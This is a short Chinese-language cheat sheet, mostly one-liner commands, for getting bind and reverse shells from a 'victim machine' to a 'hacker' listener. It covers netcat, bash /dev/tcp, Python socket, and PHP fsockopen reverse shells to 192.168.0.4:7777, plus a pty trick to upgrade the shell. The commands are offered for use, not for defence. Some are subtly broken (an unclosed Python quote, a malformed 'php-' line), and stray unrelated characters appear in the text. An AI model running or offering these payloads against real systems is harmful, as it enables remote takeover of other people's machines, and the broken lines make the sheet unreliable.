1. 正向反彈shell
受害機(jī)監(jiān)聽7777:
nc -lvp 7777 -e /bin/bash
黑客正向連接
nc ip 7777
2. 反向反彈shell
黑客監(jiān)聽7777:
nc -lvp 7777
受害機(jī)反向連接
# 基于bash反彈
bash -i >& /dev/tcp/ip/port 0>&1
# 基于python反彈
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
// 基于nc反彈
nc -e /bin/bash 192.168.0.4 7777
// 基于php反彈 注: 需要php關(guān)閉safe_mode這個(gè)選項(xiàng)
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
遇到反彈后不是正常的shell抛寝,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
轉(zhuǎn)化為常規(guī)的shell聪富。